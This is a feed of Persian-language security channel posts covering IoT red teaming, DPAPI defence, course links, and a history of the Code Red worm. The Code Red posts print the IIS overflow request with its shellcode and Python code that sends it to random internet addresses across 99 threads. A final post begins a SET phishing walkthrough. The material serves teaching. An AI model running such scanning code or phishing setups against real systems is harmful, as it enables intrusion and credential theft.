Forwarded from P.F.K Security
P.F.K Security
در این جلسه، تمرکز بر روی تاکتیکهای تیم قرمز (Red Team) در زمینه اینترنت اشیاء (IoT) است. در ابتدا، اشاره میشود که دستگاههای روزمره مانند توسترها و توالتها که نباید به اینترنت متصل شوند، در این بحث گنجانده نمیشوند. سخنران که یک تحلیلگر امنیتی در Black…
ابزارهایی مانند USB rubber duckies و LAN turtles به عنوان وسایلی برای گسترش قابلیتهای تیم قرمز معرفی میشوند. Hack5 به عنوان یک سازمان کلیدی در تولید دستگاههای سختافزاری برای تست نفوذ و تیم قرمز ذکر میشود. دو نوع اصلی حمله با استفاده از این دستگاهها شناسایی میشود: حملات فرصتطلبانه و حملات دسترسی از راه دور.
سخنران به چالشهای جمعآوری داده و خروج اطلاعات در سازمانهای بزرگ با نظارت شبکهای سختگیرانه اشاره میکند. همچنین، تکنولوژیهای بیسیم مانند بلوتوث و Wi-Fi به عنوان روشهای ممکن برای خروج دادهها مورد بحث قرار میگیرند، اما در محیطهای امن ممکن است با چالشهایی مواجه شوند.
در ادامه، به تکنولوژی LoRa اشاره میشود که به دلیل مصرف کم انرژی و قابلیتهای برد بلند، برای دستگاههای IoT مناسب است. همچنین، محدودیتهایی مانند اندازه حداکثر بسته ۲۵۵ بایتی LoRa نیز مطرح میشود. سخنران تجربیات خود را در طراحی مدارهای چاپی برای کنترل یک ماهواره شبیهسازی شده با استفاده از تکنولوژی LoRa به اشتراک میگذارد.
در بخشهای بعدی، یک حمله USB rubber ducky به نمایش گذاشته میشود که شامل تزریق کلیدها برای باز کردن یک پست وبلاگ است. همچنین، استفاده از Raspberry Pi Zero با یک برد LoRaPi برای ارتباطات بیسیم و قابلیتهای مختلف مورد بحث قرار میگیرد.
در نهایت، توصیههایی برای جلوگیری از حملات فیزیکی و نظارت بر ترافیک شبکه ارائه میشود. تأکید بر اهمیت امنیت فیزیکی و انجام بازرسیهای منظم برای شناسایی دستگاههای غیرمجاز نیز مطرح میشود. در کل، این جلسه به بررسی چالشها و فرصتهای موجود در زمینه امنیت IoT و تاکتیکهای تیم قرمز میپردازد.
@Pfksecurity
سخنران به چالشهای جمعآوری داده و خروج اطلاعات در سازمانهای بزرگ با نظارت شبکهای سختگیرانه اشاره میکند. همچنین، تکنولوژیهای بیسیم مانند بلوتوث و Wi-Fi به عنوان روشهای ممکن برای خروج دادهها مورد بحث قرار میگیرند، اما در محیطهای امن ممکن است با چالشهایی مواجه شوند.
در ادامه، به تکنولوژی LoRa اشاره میشود که به دلیل مصرف کم انرژی و قابلیتهای برد بلند، برای دستگاههای IoT مناسب است. همچنین، محدودیتهایی مانند اندازه حداکثر بسته ۲۵۵ بایتی LoRa نیز مطرح میشود. سخنران تجربیات خود را در طراحی مدارهای چاپی برای کنترل یک ماهواره شبیهسازی شده با استفاده از تکنولوژی LoRa به اشتراک میگذارد.
در بخشهای بعدی، یک حمله USB rubber ducky به نمایش گذاشته میشود که شامل تزریق کلیدها برای باز کردن یک پست وبلاگ است. همچنین، استفاده از Raspberry Pi Zero با یک برد LoRaPi برای ارتباطات بیسیم و قابلیتهای مختلف مورد بحث قرار میگیرد.
در نهایت، توصیههایی برای جلوگیری از حملات فیزیکی و نظارت بر ترافیک شبکه ارائه میشود. تأکید بر اهمیت امنیت فیزیکی و انجام بازرسیهای منظم برای شناسایی دستگاههای غیرمجاز نیز مطرح میشود. در کل، این جلسه به بررسی چالشها و فرصتهای موجود در زمینه امنیت IoT و تاکتیکهای تیم قرمز میپردازد.
@Pfksecurity
👍4
Try Hack Box
ابزارهای مورد استفاده در حملات DPAPI مهاجمان از ابزارهای مختلفی برای سوءاستفاده از DPAPI استفاده میکنند، از جمله: 1. Mimikatz: میمیکتز یک ابزار قدرتمند است که میتواند کلیدهای اصلی DPAPI را استخراج و رمزگشایی کند. این ابزار همچنین میتواند رمزعبورهای کاربران…
÷÷راههای مقابله با حملات DPAPI
محدود کردن دسترسی فیزیکی:
دسترسی فیزیکی به سیستمها را محدود کنید تا مهاجمان نتوانند به کلیدهای DPAPI دسترسی پیدا کنند.
استفاده از رمزعبورهای قوی:
از رمزعبورهای قوی و پیچیده برای حسابهای کاربری استفاده کنید تا مهاجمان نتوانند به راحتی کلیدهای اصلی را رمزگشایی کنند.
فعالسازی BitLocker:
میتواند از کلیدهای DPAPI محافظت کند و دسترسی مهاجمان به دادههای رمزگذاریشده را سختتر کند.
مانیتورینگ و لاگگیری:
فعالیتهای مشکوک در سیستم را مانیتور کنید و از ابزارهای امنیتی برای شناسایی حملات احتمالی استفاده کنید.
آموزش کاربران:
کاربران را در مورد خطرات حملات سایبری و اهمیت محافظت از رمزعبورها آموزش دهید.
سوءاستفاده از DPAPI یک تکنیک خطرناک است که میتواند منجر به سرقت اطلاعات حساس مانند رمزعبورها، کلیدهای رمزنگاری و دیگر دادههای محرمانه شود. با محدود کردن دسترسی به سیستم، استفاده از رمزعبورهای قوی و فعالسازی مکانیزمهای امنیتی مانند BitLocker، میتوانید از سیستم خود در برابر این نوع حملات محافظت کنید.
#DPAPI
@TryHackBox
محدود کردن دسترسی فیزیکی:
دسترسی فیزیکی به سیستمها را محدود کنید تا مهاجمان نتوانند به کلیدهای DPAPI دسترسی پیدا کنند.
استفاده از رمزعبورهای قوی:
از رمزعبورهای قوی و پیچیده برای حسابهای کاربری استفاده کنید تا مهاجمان نتوانند به راحتی کلیدهای اصلی را رمزگشایی کنند.
فعالسازی BitLocker:
میتواند از کلیدهای DPAPI محافظت کند و دسترسی مهاجمان به دادههای رمزگذاریشده را سختتر کند.
مانیتورینگ و لاگگیری:
فعالیتهای مشکوک در سیستم را مانیتور کنید و از ابزارهای امنیتی برای شناسایی حملات احتمالی استفاده کنید.
آموزش کاربران:
کاربران را در مورد خطرات حملات سایبری و اهمیت محافظت از رمزعبورها آموزش دهید.
سوءاستفاده از DPAPI یک تکنیک خطرناک است که میتواند منجر به سرقت اطلاعات حساس مانند رمزعبورها، کلیدهای رمزنگاری و دیگر دادههای محرمانه شود. با محدود کردن دسترسی به سیستم، استفاده از رمزعبورهای قوی و فعالسازی مکانیزمهای امنیتی مانند BitLocker، میتوانید از سیستم خود در برابر این نوع حملات محافظت کنید.
#DPAPI
@TryHackBox
Try Hack Box
#جلسه_سوم دوره #رایگان سکوریتی پلاس | Security + بخش : مهندسی اجتماعی دوره Security+ یک دوره معتبر و پایهای در زمینه امنیت سایبری است که توسط CompTIA ارائه میشود. این دوره به شما مهارتهای لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات، پیادهسازی…
#جلسه_چهارم دوره #رایگان سکوریتی پلاس | Security +
بخش : رمزنگاری
دوره Security+ یک دوره معتبر و پایهای در زمینه امنیت سایبری است که توسط CompTIA ارائه میشود. این دوره به شما مهارتهای لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات، پیادهسازی راهکارهای امنیتی،اصول رمزنگاری و درک اصول امنیت شبکه را آموزش میدهد.
قسمت اول :
https://youtu.be/Hn5qheOVz6Q
قسمت دوم :
https://youtu.be/R8Qzq0qQm3Q
قسمت سوم :
https://youtu.be/bE1KSm7U8uE
قسمت چهارم :
https://youtu.be/wOFhAGvFCSA
----------
🆔 @TryHackBox
----------
بخش : رمزنگاری
دوره Security+ یک دوره معتبر و پایهای در زمینه امنیت سایبری است که توسط CompTIA ارائه میشود. این دوره به شما مهارتهای لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات، پیادهسازی راهکارهای امنیتی،اصول رمزنگاری و درک اصول امنیت شبکه را آموزش میدهد.
قسمت اول :
https://youtu.be/Hn5qheOVz6Q
قسمت دوم :
https://youtu.be/R8Qzq0qQm3Q
قسمت سوم :
https://youtu.be/bE1KSm7U8uE
قسمت چهارم :
https://youtu.be/wOFhAGvFCSA
انتقادی داشتید حتما اطلاع بدید، تا بتونیم آموزش با کیفیتتری ارائه بدیم،امیدواریم از آموزش لذت ببرید.
----------
🆔 @TryHackBox
----------
👍4
Try Hack Box
#جلسه_چهارم دوره #رایگان سکوریتی پلاس | Security + بخش : رمزنگاری دوره Security+ یک دوره معتبر و پایهای در زمینه امنیت سایبری است که توسط CompTIA ارائه میشود. این دوره به شما مهارتهای لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات، پیادهسازی…
دوستانی که دوره سکوریتی پلاس مارو میگذرونند ، ما یک گروه ایجاد کردیم که فایل تمرینی یا اگر سوالی یا مشکلی داشتید بپرسید و فایل ها رو در اختیارتون قرار بدیم اگر مایل بودید به گروه بپیوندید به ما پیام دهید لینک گروه رو ارسال کنیم برای شما :
@Unique_exploitbot
@Unique_exploitbot
BuiltWith.pdf
869.9 KB
[+] What is BuiltWith ?
[+] کاربرد BuiltWith برای هکرها و پنتسترها .
[+] منظور از دادههای تاریخی چیست؟
[+] استفاده هکرها و پنتسترها از دادههای تاریخی.
[+] مثال برای هکرها و پنتسترها .
[+] ابزارها و دستورات برای جمعآوری دادههای تاریخی
[+] ابزارها و دستورات برای تحلیل دادههای تاریخی
[+] مثال عملی
[+] چگونه لیستی از دامنههایی که به احتمال زیاد متعلق به مالک یک سایت خاص هستند را به دست آوریم؟
#BuiltWith
@TryHackBox
[+] کاربرد BuiltWith برای هکرها و پنتسترها .
[+] منظور از دادههای تاریخی چیست؟
[+] استفاده هکرها و پنتسترها از دادههای تاریخی.
[+] مثال برای هکرها و پنتسترها .
[+] ابزارها و دستورات برای جمعآوری دادههای تاریخی
[+] ابزارها و دستورات برای تحلیل دادههای تاریخی
[+] مثال عملی
[+] چگونه لیستی از دامنههایی که به احتمال زیاد متعلق به مالک یک سایت خاص هستند را به دست آوریم؟
#BuiltWith
@TryHackBox
👍7🙏2
This media is not supported in your browser
VIEW IN TELEGRAM
سریال روز صفر Zero Day 2025
مینیسریال "روز صفر" داستان رئیسجمهور سابق ایالات متحده "جرج مالن" را روایت میکند که مأموریت دارد عاملان یک حمله سایبری ویرانگر را که کشور را دچار هرجومرج کرده است، شناسایی کند. در جریان تحقیقات، او با رازهای تاریک خود مواجه شده و نزدیکانش را در معرض خطر میبیند و ...
#معرفی_فیلم
@TryHackBox
مینیسریال "روز صفر" داستان رئیسجمهور سابق ایالات متحده "جرج مالن" را روایت میکند که مأموریت دارد عاملان یک حمله سایبری ویرانگر را که کشور را دچار هرجومرج کرده است، شناسایی کند. در جریان تحقیقات، او با رازهای تاریک خود مواجه شده و نزدیکانش را در معرض خطر میبیند و ...
#معرفی_فیلم
@TryHackBox
👍3
Forwarded from TryHackBox Story
🪱 کد رد (Code Red)
• صبح روز ۱۵ ژوئیه ۲۰۰۱: تحلیلگران شرکت eEye Digital Security در حالی که آخرین جرعههای نوشیدنی گازدار محبوبشان، Code Red Mountain Dew، را مینوشیدند، با هشدارهایی درباره گسترش سریع یک کرم کامپیوتری جدید مواجه شدند. همین موضوع باعث شد نام این بدافزار را به یاد نوشیدنی مورد علاقهشان، «کد رد» بگذارند. این نام برای بسیاری از قربانیان کرم به یاد ماندنی شد، چرا که در عرض چند روز، کد رد اینترنت را تسخیر کرد.
• چگونگی گسترش کرم: بعدها مشخص شد که گسترش این کرم از ۱۳ ژوئیه ۲۰۰۱ آغاز شده بود. این بدافزار از یک آسیبپذیری در وبسرور Internet Information Server (IIS) استفاده میکرد که مربوط به سرریز بافر (Buffer Overflow) بود. اگرچه مایکروسافت یک ماه قبل از این اتفاق، وصلهای برای رفع این آسیبپذیری منتشر کرده بود، اما بسیاری از مدیران سیستمها بهموقع این بهروزرسانی را نصب نکرده بودند. همین موضوع دلیل اصلی شیوع گسترده این کرم شد.
• آسیبپذیری مورد استفاده: کرم اینترنتی از یک آسیبپذیری ساده در یکی از ماژولهای وبسرور، بهطور خاص در بخش افزونهایندکس کردن دادهها، سوءاستفاده میکرد. در کتابخانه idq.dll یک اشکال مربوط به سرریز بافر وجود داشت. این آسیبپذیری با شناسه MS01-33 شناخته میشد. با استانداردهای امروزی، این یک اشکال بسیار ساده است که میتوان با ارسال یک درخواست بسیار طولانی به سرور، آن را مورد سوءاستفاده قرار داد. مثلاً:
در این درخواست، دادههای بعد از کاراکترهای N به عنوان دستورات تفسیر و اجرا میشوند. تمام کد مخرب در خود درخواست قرار دارد، بنابراین اگر سرور آسیبپذیر باشد، بلافاصله و با احتمال ۱۰۰٪ آلوده میشود.
• رفتار کرم: رفتار کرم بسته به تاریخ روز متفاوت بود. از روز ۱ تا ۱۹ هر ماه، کرم فقط به گسترش خود میپرداخت: با اسکن سرورهای اینترنتی، درخواستهای مخرب را به آنها ارسال میکرد. برای این کار، روی هر سیستم آلوده، ۹۹ thread موازی ایجاد میشد که هر کدام لیستی از کامپیوترهای جدید برای آلودهسازی را تولید میکردند. از روز ۲۰ تا ۲۷ هر ماه، کرم حملات DDoS را علیه لیستی از آدرسهای IP که در کد آن تعبیه شده بود، انجام میداد. یکی از این آدرسها، مربوط به وبسایت کاخ سفید بود.
• اوج شیوع: اگرچه گسترش کرم در ۱۵ ژوئیه ۲۰۰۱ گزارش شد، اما اوج آن در ۱۹ ژوئیه اتفاق افتاد، زمانی که بیش از ۳۵۹ هزار سرور آلوده شده بودند. بعدها، با نصب بهروزرسانیهای امنیتی مایکروسافت توسط مدیران سیستمها، شیوع کرم کاهش یافت. البته نسخه دوم کرم با نام Code Red II نیز ظهور کرد که از کاراکترهای X به جای N در درخواستهای خود استفاده میکرد.
• نتیجهگیری: از این ماجرا دو درس مهم میتوان گرفت. اول اینکه نصب بهموقع وصلههای امنیتی که ۲۴ سال پیش اهمیت زیادی داشت، هنوز هم موضوعی حیاتی است. دوم اینکه خوششانسی بزرگی بود که کد رد فایلها را رمزنگاری نمیکرد، پسوردها را نمیدزدید یا دادهها را نابود نمیکرد. اگر هدف مهاجمان مخربتر بود، عواقب این حمله میتوانست بسیار فاجعهبارتر باشد.
@TryHackBoxStory
• صبح روز ۱۵ ژوئیه ۲۰۰۱: تحلیلگران شرکت eEye Digital Security در حالی که آخرین جرعههای نوشیدنی گازدار محبوبشان، Code Red Mountain Dew، را مینوشیدند، با هشدارهایی درباره گسترش سریع یک کرم کامپیوتری جدید مواجه شدند. همین موضوع باعث شد نام این بدافزار را به یاد نوشیدنی مورد علاقهشان، «کد رد» بگذارند. این نام برای بسیاری از قربانیان کرم به یاد ماندنی شد، چرا که در عرض چند روز، کد رد اینترنت را تسخیر کرد.
• چگونگی گسترش کرم: بعدها مشخص شد که گسترش این کرم از ۱۳ ژوئیه ۲۰۰۱ آغاز شده بود. این بدافزار از یک آسیبپذیری در وبسرور Internet Information Server (IIS) استفاده میکرد که مربوط به سرریز بافر (Buffer Overflow) بود. اگرچه مایکروسافت یک ماه قبل از این اتفاق، وصلهای برای رفع این آسیبپذیری منتشر کرده بود، اما بسیاری از مدیران سیستمها بهموقع این بهروزرسانی را نصب نکرده بودند. همین موضوع دلیل اصلی شیوع گسترده این کرم شد.
• آسیبپذیری مورد استفاده: کرم اینترنتی از یک آسیبپذیری ساده در یکی از ماژولهای وبسرور، بهطور خاص در بخش افزونهایندکس کردن دادهها، سوءاستفاده میکرد. در کتابخانه idq.dll یک اشکال مربوط به سرریز بافر وجود داشت. این آسیبپذیری با شناسه MS01-33 شناخته میشد. با استانداردهای امروزی، این یک اشکال بسیار ساده است که میتوان با ارسال یک درخواست بسیار طولانی به سرور، آن را مورد سوءاستفاده قرار داد. مثلاً:
GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
در این درخواست، دادههای بعد از کاراکترهای N به عنوان دستورات تفسیر و اجرا میشوند. تمام کد مخرب در خود درخواست قرار دارد، بنابراین اگر سرور آسیبپذیر باشد، بلافاصله و با احتمال ۱۰۰٪ آلوده میشود.
• رفتار کرم: رفتار کرم بسته به تاریخ روز متفاوت بود. از روز ۱ تا ۱۹ هر ماه، کرم فقط به گسترش خود میپرداخت: با اسکن سرورهای اینترنتی، درخواستهای مخرب را به آنها ارسال میکرد. برای این کار، روی هر سیستم آلوده، ۹۹ thread موازی ایجاد میشد که هر کدام لیستی از کامپیوترهای جدید برای آلودهسازی را تولید میکردند. از روز ۲۰ تا ۲۷ هر ماه، کرم حملات DDoS را علیه لیستی از آدرسهای IP که در کد آن تعبیه شده بود، انجام میداد. یکی از این آدرسها، مربوط به وبسایت کاخ سفید بود.
• اوج شیوع: اگرچه گسترش کرم در ۱۵ ژوئیه ۲۰۰۱ گزارش شد، اما اوج آن در ۱۹ ژوئیه اتفاق افتاد، زمانی که بیش از ۳۵۹ هزار سرور آلوده شده بودند. بعدها، با نصب بهروزرسانیهای امنیتی مایکروسافت توسط مدیران سیستمها، شیوع کرم کاهش یافت. البته نسخه دوم کرم با نام Code Red II نیز ظهور کرد که از کاراکترهای X به جای N در درخواستهای خود استفاده میکرد.
• نتیجهگیری: از این ماجرا دو درس مهم میتوان گرفت. اول اینکه نصب بهموقع وصلههای امنیتی که ۲۴ سال پیش اهمیت زیادی داشت، هنوز هم موضوعی حیاتی است. دوم اینکه خوششانسی بزرگی بود که کد رد فایلها را رمزنگاری نمیکرد، پسوردها را نمیدزدید یا دادهها را نابود نمیکرد. اگر هدف مهاجمان مخربتر بود، عواقب این حمله میتوانست بسیار فاجعهبارتر باشد.
@TryHackBoxStory
👍5
Forwarded from TryHackBox Story
TryHackBox Story
🪱 کد رد (Code Red) • صبح روز ۱۵ ژوئیه ۲۰۰۱: تحلیلگران شرکت eEye Digital Security در حالی که آخرین جرعههای نوشیدنی گازدار محبوبشان، Code Red Mountain Dew، را مینوشیدند، با هشدارهایی درباره گسترش سریع یک کرم کامپیوتری جدید مواجه شدند. همین موضوع باعث شد نام…
تحلیل حمله بر فرض مثال چطوری کرم گسترش پیدا کرده :
۱. روش اصلی حمله: سوءاستفاده از آسیبپذیری سرریز بافر (Buffer Overflow)
هدف: وبسرورهای Microsoft IIS (Internet Information Services) که نسخههای آسیبپذیر کتابخانه idq.dll را اجرا میکردند.
مکانیزم:
کرم با ارسال یک درخواست HTTP مخرب به شکل زیر، باعث سرریز بافر در ماژول ایندکسسازی (Indexing Service) میشد:
رشته Nها باعث سرریز بافر و بازنویسی حافظه میشد.
کد هگزادسیمال بعدی (%u9090...) حاوی دستورات ماشینی (Shellcode) بود که کنترل سرور را به مهاجم میداد.
۲. روشهای گسترش خودکار
+ اسکن تصادفی IPها:
کرم به صورت خودکار آدرسهای IP تصادفی را اسکن میکرد و به هر سروری که پورت ۸۰ (HTTP) باز بود، درخواست مخرب خود را ارسال مینمود.
اسکن تصادفی IPها
کرم Code Red از الگوریتمهای سادهای برای تولید آدرسهای IP تصادفی استفاده میکرد. در پایتون، این فرآیند را میتوان به صورت زیر شبیهسازی کرد:
+ ارسال درخواست مخرب به پورت ۸۰
کرم پس از پیدا کردن یک سرور با پورت ۸۰ باز، درخواست HTTP مخرب خود را ارسال میکرد. در پایتون، این کار را میتوان با استفاده از کتابخانه socket شبیهسازی کرد:
تکثیر موازی:
روی هر سیستم آلوده، ۹۹ thread موازی ایجاد میکرد تا اسکن و آلودهسازی را تسریع کند.
+ ایجاد Threadهای موازی برای اسکن و آلودهسازی
کرم Code Red از ۹۹ thread موازی برای تسریع فرآیند اسکن و آلودهسازی استفاده میکرد. در پایتون، این کار را میتوان با استفاده از کتابخانه
---
عدم نیاز به تعامل کاربر:
برخلاف بسیاری از بدافزارها، Code Red برای گسترش نیازی به کلیک کاربر یا اجرای فایل پیوست نداشت. تنها کافی بود سرور به اینترنت متصل باشد!
جمعبندی
این کدها صرفاً برای درک بهتر مکانیزمهای گسترش کرم Code Red ارائه شدهاند. امروزه، چنین حملاتی با استفاده از فایروالها، سیستمهای تشخیص نفوذ (IDS)، و بهروزرسانیهای امنیتی به راحتی قابل پیشگیری هستند.
@TryHackBoxStory
۱. روش اصلی حمله: سوءاستفاده از آسیبپذیری سرریز بافر (Buffer Overflow)
هدف: وبسرورهای Microsoft IIS (Internet Information Services) که نسخههای آسیبپذیر کتابخانه idq.dll را اجرا میکردند.
مکانیزم:
کرم با ارسال یک درخواست HTTP مخرب به شکل زیر، باعث سرریز بافر در ماژول ایندکسسازی (Indexing Service) میشد:
GET /default.ida?[رشته طولانی از Nها]%u9090%u6858%ucbd3%u7801... HTTP/1.0
رشته Nها باعث سرریز بافر و بازنویسی حافظه میشد.
کد هگزادسیمال بعدی (%u9090...) حاوی دستورات ماشینی (Shellcode) بود که کنترل سرور را به مهاجم میداد.
۲. روشهای گسترش خودکار
+ اسکن تصادفی IPها:
کرم به صورت خودکار آدرسهای IP تصادفی را اسکن میکرد و به هر سروری که پورت ۸۰ (HTTP) باز بود، درخواست مخرب خود را ارسال مینمود.
اسکن تصادفی IPها
کرم Code Red از الگوریتمهای سادهای برای تولید آدرسهای IP تصادفی استفاده میکرد. در پایتون، این فرآیند را میتوان به صورت زیر شبیهسازی کرد:
import random
def generate_random_ip():
return ".".join(str(random.randint(0, 255)) for _ in range(4))
# مثال: تولید ۱۰ آدرس IP تصادفی
for _ in range(10):
print(generate_random_ip())
+ ارسال درخواست مخرب به پورت ۸۰
کرم پس از پیدا کردن یک سرور با پورت ۸۰ باز، درخواست HTTP مخرب خود را ارسال میکرد. در پایتون، این کار را میتوان با استفاده از کتابخانه socket شبیهسازی کرد:
import socket
def send_malicious_request(ip):
try:
# ایجاد یک سوکت TCP
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2) # تنظیم timeout برای اتصال
sock.connect((ip, 80)) # اتصال به پورت ۸۰
# ارسال درخواست مخرب
malicious_request = (
"GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0\r\n"
"Host: example.com\r\n"
"\r\n"
)
sock.send(malicious_request.encode())
# دریافت پاسخ (اختیاری)
response = sock.recv(4096)
print(f"Response from {ip}: {response.decode()}")
sock.close()
except Exception as e:
print(f"Failed to connect to {ip}: {e}")
# مثال: ارسال درخواست به یک IP تصادفی
random_ip = generate_random_ip()
send_malicious_request(random_ip)
تکثیر موازی:
روی هر سیستم آلوده، ۹۹ thread موازی ایجاد میکرد تا اسکن و آلودهسازی را تسریع کند.
+ ایجاد Threadهای موازی برای اسکن و آلودهسازی
کرم Code Red از ۹۹ thread موازی برای تسریع فرآیند اسکن و آلودهسازی استفاده میکرد. در پایتون، این کار را میتوان با استفاده از کتابخانه
threading شبیهسازی کرد:import threading
def scan_and_infect(ip):
print(f"Scanning {ip}...")
send_malicious_request(ip)
# ایجاد ۹۹ thread موازی
threads = []
for _ in range(99):
ip = generate_random_ip()
thread = threading.Thread(target=scan_and_infect, args=(ip,))
thread.start()
threads.append(thread)
# منتظر ماندن برای اتمام تمام threadها
for thread in threads:
thread.join()
---
عدم نیاز به تعامل کاربر:
برخلاف بسیاری از بدافزارها، Code Red برای گسترش نیازی به کلیک کاربر یا اجرای فایل پیوست نداشت. تنها کافی بود سرور به اینترنت متصل باشد!
جمعبندی
این کدها صرفاً برای درک بهتر مکانیزمهای گسترش کرم Code Red ارائه شدهاند. امروزه، چنین حملاتی با استفاده از فایروالها، سیستمهای تشخیص نفوذ (IDS)، و بهروزرسانیهای امنیتی به راحتی قابل پیشگیری هستند.
@TryHackBoxStory
❤2
🔖 Cyberdefense Active Directory Mindmap v2025.03
یک برگه تقلب فوقالعاده دقیق برای بررسی زیرساختهای AD .
➡️ SVG
➡️ PNG
⛺️ Home
#AD
@TryHackBox
یک برگه تقلب فوقالعاده دقیق برای بررسی زیرساختهای AD .
➡️ SVG
➡️ PNG
⛺️ Home
#AD
@TryHackBox
🙏2❤1
Forwarded from TryHackBox Story
Hack Bank With Social Enginnering pdf.pdf
596.7 KB
داستان واقعی هک بانک با استفاده از روش های مهندسی اجتماعی ...
این مقاله درباره نفوذ فیزیکی به یکی از بانکهای لبنان است. یک پروژه قانونی با پایانی غیرمنتظره که توسط یکی از مشهورترین متخصصان تست نفوذ فیزیکی، جیسون ای. استریت (https://jaysonestreet.com/) انجام شده است!
• کل داستان مجموعهای از واقعیتها است که با نظرات شخصی او از سخنرانیها، مصاحبهها و گفتوگوهای پشت صحنه ترکیب شده است. اگر علاقهمندید بدانید چگونه امنیت فیزیکی یک بانک با استفاده از مهندسی اجتماعی آزمایش شده ...
@TryHackBoxStory
@TryHackBox
@TryHackBoxOfficial
این مقاله درباره نفوذ فیزیکی به یکی از بانکهای لبنان است. یک پروژه قانونی با پایانی غیرمنتظره که توسط یکی از مشهورترین متخصصان تست نفوذ فیزیکی، جیسون ای. استریت (https://jaysonestreet.com/) انجام شده است!
• کل داستان مجموعهای از واقعیتها است که با نظرات شخصی او از سخنرانیها، مصاحبهها و گفتوگوهای پشت صحنه ترکیب شده است. اگر علاقهمندید بدانید چگونه امنیت فیزیکی یک بانک با استفاده از مهندسی اجتماعی آزمایش شده ...
@TryHackBoxStory
@TryHackBox
@TryHackBoxOfficial
👍5🙏1
Try Hack Box
#سوال معمولاً چگونه به یک شبکه هدف دسترسی اولیه پیدا میکنید؟
این سوال یک پاسخ ثابت نداره چرا که روشهای دسترسی اولیه به شبکه بسیار متنوع هستند و بستگی به عوامل زیر دارد:
مهارت مهاجم (مبتدی vs حرفهای)،
سطح امنیت شبکه هدف،
نوع سیستمها و سرویسهای در دسترس،
منابع و زمان در اختیار مهاجم.
و موارد دیگر
⭕ | روشهای دیگری نیز برای دسترسی اولیه به شبکه هدف وجود دارد. برخی از این روشها عبارتند از:
+ مهندسی اجتماعی
+ دسترسی فیزیکی
+ حمله زنجیره تامین
+ استفاده از اعتبارنامه های لو رفته
+ و موارد دیگه
هر یک از این روشها بسته به سطح امنیت شبکه هدف، پیچیدگی فنی، و منابع مهاجم ممکن است استفاده شوند.
🧩 مثال برای درک بهتر:
اگر سازمانی کاربران آموزشندیده داشته باشد، احتمال موفقیت فیشینگ یا مهندسی اجتماعی بیشتر است.
اگر سازمانی سرویسهای قدیمی با آسیبپذیریهای شناختهشده داشته باشد، سوءاستفاده از اکسپلویتها روش کارآمدتری است.
اگر مهاجم دسترسی فیزیکی به تجهیزات داشته باشد، ممکن است از کیلاگر یا دستگاههای مخرب USB استفاده کند.
💢 حال ما فرض میکنیم جواب این سوال :
دسترسی اولیه به یک شبکه هدف معمولاً از طریق تکنیکهایی مانند فیشینگ، سوءاستفاده از آسیبپذیریها یا استفاده از پیکربندیهای نادرست به دست میآید.
⭕ | خب بریم کمی وارد این جواب بشیم و به طور عملی کار کنیم :
اول فشینگ را بررسی میکنیم :
چگونه اتفاق میافتد؟
مهاجمان با ارسال ایمیلها، پیامها یا لینکهای جعلی، کاربران را فریب میدهند تا اطلاعات حساس مانند نام کاربری، رمز عبور یا سایر دادهها را افشا کنند. این لینکها ممکن است به صفحات ورود جعلی هدایت شوند یا حاوی فایلهای مخرب باشند.
ابزارها و کدهای مورد استفاده:
ابزارهایی مانند SET (Social-Engineer Toolkit) یا Gophish برای ایجاد صفحات فیشینگ و ارسال ایمیلهای جعلی.
کدهای HTML و JavaScript برای طراحی صفحات جعلی.
فایلهای مخرب مانند اسکریپتهای PowerShell یا ماکروهای Office که پس از اجرا، دسترسی مهاجم را فراهم میکنند.
این پست ادامه دارد ...
@TryHackBox
👍5❤1
Try Hack Box
این سوال یک پاسخ ثابت نداره چرا که روشهای دسترسی اولیه به شبکه بسیار متنوع هستند و بستگی به عوامل زیر دارد: مهارت مهاجم (مبتدی vs حرفهای)، سطح امنیت شبکه هدف، نوع سیستمها و سرویسهای در دسترس، منابع و زمان در اختیار مهاجم. و موارد دیگر ⭕ | روشهای دیگری…
SET یا Social-Engineer Toolkit
یکی از ابزارهای قدرتمند و محبوب برای انجام حملات فیشینگ است. این ابزار به مهاجمان اجازه میدهد تا صفحات ورود جعلی ایجاد کنند، ایمیلهای فیشینگ ارسال کنند و حتی بدافزارها را توزیع کنند. در اینجا مراحل انجام یک حمله فیشینگ با استفاده از SET به طور کامل و با جزئیات توضیح داده شده است:
مراحل انجام فیشینگ با SET:
۱. نصب و راهاندازی SET:
معمولاً به صورت پیشفرض در توزیعهای لینوکس مانند Kali Linux نصب شده است. اگر نصب نیست، میتوانید آن را با دستور زیر نصب کنید:
پس از نصب، SET را با دستور زیر اجرا کنید:
۲. پیکربندی اولیه SET:
پس از اجرای SET، ممکن است از شما خواسته شود که برخی تنظیمات اولیه را انجام دهید. این تنظیمات شامل انتخاب نوع حمله، پیکربندی سرور و غیره است. برای شروع، معمولاً گزینههای پیشفرض کافی هستند.
۳. انتخاب نوع حمله:
